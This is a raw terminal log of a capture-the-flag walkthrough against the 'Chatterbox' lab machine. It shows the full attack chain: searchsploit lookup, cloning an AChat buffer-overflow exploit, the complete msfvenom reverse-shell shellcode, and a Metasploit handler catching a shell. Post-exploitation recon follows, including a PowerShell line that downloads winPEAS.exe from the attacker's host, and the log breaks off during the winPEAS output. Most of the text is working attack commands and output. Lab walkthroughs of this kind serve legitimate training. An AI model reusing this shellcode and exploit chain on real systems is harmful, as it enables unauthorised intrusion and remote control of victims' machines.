RECON


SEARCH FOR EXPLOIT
oot@kali:~/htb/chatterbox# searchsploit  AChat chat system
Exploits: No Result
Shellcodes: No Result
root@kali:~/htb/chatterbox# searchsploit AChat
------------------------------------------------------ ----------------------------------------
 Exploit Title                                        |  Path
                                                      | (/usr/share/exploitdb/)
------------------------------------------------------ ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow            | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploi | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting  | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                    | exploits/php/webapps/24647.txt
------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

SEARCH FOR ALTERNATIVE EXPLOIT
https://github.com/EDB4YLI55/achat_reverse_tcp_exploit

root@kali:~/htb/chatterbox# git clone https://github.com/EDB4YLI55/achat_reverse_tcp_exploit.git
Cloning into 'achat_reverse_tcp_exploit'...
remote: Enumerating objects: 21, done.
remote: Total 21 (delta 0), reused 0 (delta 0), pack-reused 21
Unpacking objects: 100% (21/21), done.
root@kali:~/htb/chatterbox# cd achat_reverse_tcp_exploit/
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# ls -l
total 16
-rw-r--r-- 1 root root 5412 Samh  20 20:43 AChat_Exploit.py
-rw-r--r-- 1 root root  835 Samh  20 20:43 AChat_Payload.sh
-rw-r--r-- 1 root root 1057 Samh  20 20:43 README.md

MAKE ACHAT SCRIPTS EXECUTABLE
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# ls -l
total 136
-rw-r--r-- 1 root root  5412 Samh  20 20:43 AChat_Exploit.py
-rw-r--r-- 1 root root   835 Samh  20 20:43 AChat_Payload.sh
-rwxr-xr-x 1 root root 59392 Samh  20 20:43 nc
-rwxr-xr-x 1 root root 59392 Samh  20 20:43 nc.exe
-rw-r--r-- 1 root root  1057 Samh  20 20:43 README.md
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# chmod 744 AChat_*
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# ls -l
total 136
-rwxr--r-- 1 root root  5412 Samh  20 20:43 AChat_Exploit.py
-rwxr--r-- 1 root root   835 Samh  20 20:43 AChat_Payload.sh
-rwxr-xr-x 1 root root 59392 Samh  20 20:43 nc
-rwxr-xr-x 1 root root 59392 Samh  20 20:43 nc.exe
-rw-r--r-- 1 root root  1057 Samh  20 20:43 README.md

EDIT ACHAT PAYLOAD SCRIPT TO GENERATE MSFVENOM WINDOWS SHELL REVERSE TCP
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# vim AChat_Payload.sh
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp

RUN ACHAT SCRIPT TO GET PAYLOAD
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# ./AChat_Payload.sh 
RHOST: 10.10.10.74
LHOST: 10.10.14.8
LPORT: 1234
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3706 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x58\x68\x74\x42"
buf += "\x6d\x30\x69\x70\x6d\x30\x71\x50\x74\x49\x38\x65\x6d"
buf += "\x61\x49\x30\x52\x44\x64\x4b\x32\x30\x70\x30\x42\x6b"
buf += "\x42\x32\x4a\x6c\x64\x4b\x52\x32\x4b\x64\x62\x6b\x42"
buf += "\x52\x4d\x58\x5a\x6f\x77\x47\x4f\x5a\x4f\x36\x6e\x51"
buf += "\x4b\x4f\x36\x4c\x6d\x6c\x70\x61\x71\x6c\x69\x72\x6c"
buf += "\x6c\x4f\x30\x75\x71\x56\x6f\x5a\x6d\x79\x71\x37\x57"
buf += "\x39\x52\x4b\x42\x71\x42\x6f\x67\x32\x6b\x70\x52\x4c"
buf += "\x50\x32\x6b\x6f\x5a\x6f\x4c\x62\x6b\x4e\x6c\x4c\x51"
buf += "\x50\x78\x5a\x43\x4d\x78\x4d\x31\x78\x51\x6f\x61\x42"
buf += "\x6b\x52\x39\x4f\x30\x59\x71\x68\x53\x42\x6b\x61\x39"
buf += "\x4e\x38\x49\x53\x6f\x4a\x6d\x79\x54\x4b\x4c\x74\x74"
buf += "\x4b\x69\x71\x4a\x36\x30\x31\x49\x6f\x34\x6c\x75\x71"
buf += "\x38\x4f\x5a\x6d\x5a\x61\x67\x57\x4e\x58\x57\x70\x52"
buf += "\x55\x39\x66\x6c\x43\x63\x4d\x6c\x38\x6f\x4b\x51\x6d"
buf += "\x4e\x44\x62\x55\x77\x74\x4e\x78\x54\x4b\x71\x48\x4e"
buf += "\x44\x4a\x61\x39\x43\x33\x36\x72\x6b\x4c\x4c\x70\x4b"
buf += "\x64\x4b\x31\x48\x6d\x4c\x6b\x51\x46\x73\x34\x4b\x69"
buf += "\x74\x34\x4b\x39\x71\x36\x70\x55\x39\x6d\x74\x6b\x74"
buf += "\x6d\x54\x51\x4b\x4f\x6b\x50\x61\x4f\x69\x51\x4a\x72"
buf += "\x31\x39\x6f\x79\x50\x71\x4f\x4f\x6f\x4e\x7a\x34\x4b"
buf += "\x5a\x72\x38\x6b\x74\x4d\x51\x4d\x4f\x78\x70\x33\x30"
buf += "\x32\x6b\x50\x59\x70\x50\x68\x34\x37\x52\x53\x4d\x62"
buf += "\x31\x4f\x6f\x64\x50\x68\x6e\x6c\x53\x47\x4b\x76\x6c"
buf += "\x47\x69\x6f\x69\x45\x34\x78\x54\x50\x4d\x31\x69\x70"
buf += "\x4d\x30\x4c\x69\x69\x34\x42\x34\x32\x30\x6f\x78\x4c"
buf += "\x69\x35\x30\x30\x6b\x49\x70\x4b\x4f\x5a\x35\x70\x50"
buf += "\x30\x50\x42\x30\x52\x30\x6f\x50\x62\x30\x4d\x70\x32"
buf += "\x30\x62\x48\x49\x5a\x6a\x6f\x79\x4f\x6b\x30\x39\x6f"
buf += "\x46\x75\x36\x37\x31\x5a\x69\x75\x72\x48\x4a\x6a\x7a"
buf += "\x6a\x6c\x4e\x79\x78\x6f\x78\x5a\x62\x59\x70\x4b\x54"
buf += "\x76\x72\x51\x79\x38\x66\x50\x6a\x4e\x30\x4e\x76\x30"
buf += "\x57\x62\x48\x53\x69\x44\x65\x43\x44\x73\x31\x39\x6f"
buf += "\x67\x65\x35\x35\x57\x50\x51\x64\x6c\x4c\x49\x6f\x6e"
buf += "\x6e\x4d\x38\x73\x45\x7a\x4c\x50\x68\x7a\x50\x75\x65"
buf += "\x67\x32\x32\x36\x59\x6f\x4a\x35\x31\x58\x61\x53\x70"
buf += "\x6d\x4f\x74\x4d\x30\x62\x69\x78\x63\x31\x47\x72\x37"
buf += "\x70\x57\x6e\x51\x38\x76\x70\x6a\x4e\x32\x71\x49\x71"
buf += "\x46\x49\x52\x69\x6d\x43\x36\x67\x57\x61\x34\x6f\x34"
buf += "\x6d\x6c\x6d\x31\x59\x71\x64\x4d\x61\x34\x4d\x54\x6a"
buf += "\x70\x46\x66\x6b\x50\x50\x44\x52\x34\x30\x50\x30\x56"
buf += "\x52\x36\x30\x56\x51\x36\x4f\x66\x50\x4e\x30\x56\x71"
buf += "\x46\x6f\x63\x61\x46\x63\x38\x70\x79\x76\x6c\x6d\x6f"
buf += "\x33\x56\x39\x6f\x67\x65\x75\x39\x69\x50\x6e\x6e\x52"
buf += "\x36\x4f\x56\x79\x6f\x30\x30\x51\x58\x4c\x48\x61\x77"
buf += "\x4b\x6d\x53\x30\x4b\x4f\x7a\x35\x55\x6b\x4b\x30\x6b"
buf += "\x6d\x4b\x7a\x79\x7a\x50\x68\x36\x46\x33\x65\x65\x6d"
buf += "\x53\x6d\x59\x6f\x76\x75\x6f\x4c\x6b\x56\x61\x6c\x79"
buf += "\x7a\x65\x30\x4b\x4b\x69\x50\x73\x45\x5a\x65\x55\x6b"
buf += "\x6f\x57\x6a\x73\x72\x52\x70\x6f\x42\x4a\x6d\x30\x31"
buf += "\x43\x69\x6f\x7a\x35\x41\x41"

MODIFY ACHAT EXPLOIT SCRIPT TO ADD PAYLOAD SHELLCODE AND ADJUST THE SERVER ADDRESS 
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# vim AChat_Exploit.py 
def main (buf):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server_address = ('10.10.10.74', 9256)

SETUP MSFCONSOLE REVERSE SHELL
root@kali:~/htb/chatterbox# msfconsole 
                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/shell_reverse_tcp 
payload => windows/shell_reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1234 


RUN ACHAT EXPLOIT SCRIPT
root@kali:~/htb/chatterbox/achat_reverse_tcp_exploit# python AChat_Exploit.py 
[+] BUFFER OVERFLOW PAYLOAD RELEASED -- CHECK YOUR HANDLER

GET LOW PRIVILEGE REVERSE SHELL
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1234 
[*] Command shell session 6 opened (10.10.14.8:1234 -> 10.10.10.74:49163) at 2020-11-20 21:21:45 -0500



C:\Windows\system32>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users

12/10/2017  09:21 AM    <DIR>          .
12/10/2017  09:21 AM    <DIR>          ..
12/10/2017  01:34 PM    <DIR>          Administrator
12/10/2017  09:18 AM    <DIR>          Alfred
04/11/2011  09:21 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  18,162,266,112 bytes free

C:\Users>cd Aldred
cd Aldred
The system cannot find the path specified.

C:\Users>cd Alfred
cd Alfred

C:\Users\Alfred>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Alfred

12/10/2017  09:18 AM    <DIR>          .
12/10/2017  09:18 AM    <DIR>          ..
12/10/2017  12:05 PM    <DIR>          Contacts
12/10/2017  06:50 PM    <DIR>          Desktop
12/10/2017  12:05 PM    <DIR>          Documents
12/10/2017  12:25 PM    <DIR>          Downloads
12/10/2017  12:05 PM    <DIR>          Favorites
12/10/2017  12:05 PM    <DIR>          Links
12/10/2017  12:05 PM    <DIR>          Music
12/10/2017  12:05 PM    <DIR>          Pictures
12/10/2017  12:05 PM    <DIR>          Saved Games
12/10/2017  12:05 PM    <DIR>          Searches
12/10/2017  12:05 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  18,162,266,112 bytes free

C:\Users\Alfred>cd Desktop
cd Desktop

C:\Users\Alfred\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Alfred\Desktop

12/10/2017  06:50 PM    <DIR>          .
12/10/2017  06:50 PM    <DIR>          ..
12/10/2017  06:50 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,162,266,112 bytes free

GET USER FLAG

C:\Users\Alfred\Desktop>type user.txt
type user.txt
##################################
C:\Users\Alfred\Desktop>

PRIVESC

GET USER PRIVILEGES
C:\Users\Alfred\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

GET SYSTEM INFO
C:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00371-223-0897461-86794
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          11/20/2020, 5:14:55 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,656 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,415 MB
Virtual Memory: In Use:    680 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 208 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2830477
                           [06]: KB2592687
                           [07]: KB2479943
                           [08]: KB2491683
                           [09]: KB2506212
                           [10]: KB2506928
                           [11]: KB2509553
                           [12]: KB2532531
                           [13]: KB2533552
                           [14]: KB2533623
                           [15]: KB2534111
                           [16]: KB2545698
                           [17]: KB2547666
                           [18]: KB2552343
                           [19]: KB2560656
                           [20]: KB2563227
                           [21]: KB2564958
                           [22]: KB2574819
                           [23]: KB2579686
                           [24]: KB2585542
                           [25]: KB2604115
                           [26]: KB2620704
                           [27]: KB2621440
                           [28]: KB2631813
                           [29]: KB2639308
                           [30]: KB2640148
                           [31]: KB2647753
                           [32]: KB2653956
                           [33]: KB2654428
                           [34]: KB2656356
                           [35]: KB2660075
                           [36]: KB2667402
                           [37]: KB2676562
                           [38]: KB2685811
                           [39]: KB2685813
                           [40]: KB2685939
                           [41]: KB2690533
                           [42]: KB2698365
                           [43]: KB2705219
                           [44]: KB2719857
                           [45]: KB2726535
                           [46]: KB2727528
                           [47]: KB2729094
                           [48]: KB2731771
                           [49]: KB2732059
                           [50]: KB2732487
                           [51]: KB2736422
                           [52]: KB2742599
                           [53]: KB2750841
                           [54]: KB2758857
                           [55]: KB2761217
                           [56]: KB2763523
                           [57]: KB2770660
                           [58]: KB2773072
                           [59]: KB2786081
                           [60]: KB2799926
                           [61]: KB2800095
                           [62]: KB2807986
                           [63]: KB2808679
                           [64]: KB2813430
                           [65]: KB2820331
                           [66]: KB2834140
                           [67]: KB2836942
                           [68]: KB2836943
                           [69]: KB2840631
                           [70]: KB2843630
                           [71]: KB2847927
                           [72]: KB2852386
                           [73]: KB2853952
                           [74]: KB2857650
                           [75]: KB2861698
                           [76]: KB2862152
                           [77]: KB2862330
                           [78]: KB2862335
                           [79]: KB2864202
                           [80]: KB2868038
                           [81]: KB2871997
                           [82]: KB2882822
                           [83]: KB2884256
                           [84]: KB2888049
                           [85]: KB2891804
                           [86]: KB2892074
                           [87]: KB2893294
                           [88]: KB2893519
                           [89]: KB2894844
                           [90]: KB2900986
                           [91]: KB2908783
                           [92]: KB2911501
                           [93]: KB2912390
                           [94]: KB2918077
                           [95]: KB2919469
                           [96]: KB2923545
                           [97]: KB2931356
                           [98]: KB2937610
                           [99]: KB2943357
                           [100]: KB2952664
                           [101]: KB2965788
                           [102]: KB2966583
                           [103]: KB2968294
                           [104]: KB2970228
                           [105]: KB2972100
                           [106]: KB2972211
                           [107]: KB2973112
                           [108]: KB2973201
                           [109]: KB2973351
                           [110]: KB2977292
                           [111]: KB2978120
                           [112]: KB2978742
                           [113]: KB2984972
                           [114]: KB2984976
                           [115]: KB2985461
                           [116]: KB2991963
                           [117]: KB2992611
                           [118]: KB3003743
                           [119]: KB3004361
                           [120]: KB3004375
                           [121]: KB3006121
                           [122]: KB3006137
                           [123]: KB3010788
                           [124]: KB3011780
                           [125]: KB3013531
                           [126]: KB3019978
                           [127]: KB3020370
                           [128]: KB3020388
                           [129]: KB3021674
                           [130]: KB3021917
                           [131]: KB3022777
                           [132]: KB3023215
                           [133]: KB3030377
                           [134]: KB3031432
                           [135]: KB3035126
                           [136]: KB3037574
                           [137]: KB3042058
                           [138]: KB3045685
                           [139]: KB3046017
                           [140]: KB3046269
                           [141]: KB3054476
                           [142]: KB3055642
                           [143]: KB3059317
                           [144]: KB3060716
                           [145]: KB3061518
                           [146]: KB3067903
                           [147]: KB3068708
                           [148]: KB3071756
                           [149]: KB3072305
                           [150]: KB3074543
                           [151]: KB3075220
                           [152]: KB3075226
                           [153]: KB3076895
                           [154]: KB3078601
                           [155]: KB3078667
                           [156]: KB3080079
                           [157]: KB3080149
                           [158]: KB3084135
                           [159]: KB3086255
                           [160]: KB3092601
                           [161]: KB3092627
                           [162]: KB3093513
                           [163]: KB3097989
                           [164]: KB3101722
                           [165]: KB3102429
                           [166]: KB3107998
                           [167]: KB3108371
                           [168]: KB3108381
                           [169]: KB3108664
                           [170]: KB3109103
                           [171]: KB3109560
                           [172]: KB3110329
                           [173]: KB3115858
                           [174]: KB3118401
                           [175]: KB3122648
                           [176]: KB3123479
                           [177]: KB3126446
                           [178]: KB3126587
                           [179]: KB3127220
                           [180]: KB3133977
                           [181]: KB3137061
                           [182]: KB3138378
                           [183]: KB3138612
                           [184]: KB3138910
                           [185]: KB3139398
                           [186]: KB3139914
                           [187]: KB3140245
                           [188]: KB3147071
                           [189]: KB3150220
                           [190]: KB3150513
                           [191]: KB3155178
                           [192]: KB3156016
                           [193]: KB3156019
                           [194]: KB3159398
                           [195]: KB3161102
                           [196]: KB3161949
                           [197]: KB3161958
                           [198]: KB3172605
                           [199]: KB3177467
                           [200]: KB3179573
                           [201]: KB3184143
                           [202]: KB3185319
                           [203]: KB4014596
                           [204]: KB4019990
                           [205]: KB4040980
                           [206]: KB976902
                           [207]: KB982018
                           [208]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74

REVIEW FOR EXPLOITS USING WINDOWS EXPLOIT SUGGESTER
root@kali:~/htb/chatterbox# python /root/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /root/Windows-Exploit-Suggester/2020-11-04-mssb.xls --systeminfo /root/htb/chatterbox/systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 208 hotfix(es) against the 381 potential bulletins(s) with a database of 137 known exploits
[*] there are now 151 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[*] done


TRANSFER WINPEAS SCRIPT
C:\Users\Alfred\AppData\Local\Temp>powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.8/winPEAS.exe','C:\Users\Alfred\AppData\Local\Temp\winPEAS.exe')



C:\Users\Alfred\AppData\Local\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Alfred\AppData\Local\Temp

11/20/2020  09:51 PM    <DIR>          .
11/20/2020  09:51 PM    <DIR>          ..
01/30/2018  04:45 PM           196,608 33E41156-5F58-4EB3-B7AB-2BDE5BB1E1AA.Diagnose.0.etl
11/20/2020  09:51 PM           135,680 41015.exe

C:\Users\Alfred\Desktop>cd %tmp%
cd %tmp%



REVIEW WINPEAS OUTPUT
C:\Users\Alfred\AppData\Local\Temp>winPEAS.exe
winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
   Creating Dynamic lists, this could take a while, please wait...
   - Checking if domain...
   - Getting Win32_UserAccount info...
   - Creating current user groups list...
   - Creating active users list...
   - Creating disabled users list...
   - Admin users list...
     
             *((,.,/((((((((((((((((((((/,  */               
      ,/*,..*((((((((((((((((((((((((((((((((((,           
    ,*/((((((((((((((((((/,  .*//((//**, .*(((((((*       
    ((((((((((((((((**********/########## .(* ,(((((((   
    (((((((((((/********************/####### .(. (((((((
    ((((((..******************/@@@@@/***/###### ./(((((((
    ,,....********************@@@@@@@@@@(***,#### .//((((((
    , ,..********************/@@@@@%@@@@/********##((/ /((((
    ..((###########*********/%@@@@@@@@@/************,,..((((
    .(##################(/******/@@@@@/***************.. /((
    .(#########################(/**********************..*((
    .(##############################(/*****************.,(((
    .(###################################(/************..(((
    .(#######################################(*********..(((
    .(#######(,.***.,(###################(..***.*******..(((
    .(#######*(#####((##################((######/(*****..(((
    .(###################(/***********(##############(...(((
    .((#####################/*******(################.((((((
    .(((############################################(..((((
    ..(((##########################################(..(((((
    ....((########################################( .(((((
    ......((####################################( .((((((
    (((((((((#################################(../((((((
        (((((((((/##########################(/..((((((
              (((((((((/,.  ,*//////*,. ./(((((((((((((((.
                 (((((((((((((((((((((((((((((/

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

  WinPEAS v1.1 by carlospolop

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

   [?] You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation


  ==========================================(System Information)==========================================

  [+] Basic System Information
   [?] Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
    Hostname: Chatterbox
    ProductName: Windows 7 Professional
    EditionID: Professional
    ReleaseId: 
    BuildBranch: 
    CurrentMajorVersionNumber: 
    CurrentVersion: 6.1
    Architecture: x86
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-05:00) Eastern Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 11/20/2020 10:14:55 PM
    HighIntegrity: False
    PartOfDomain: False
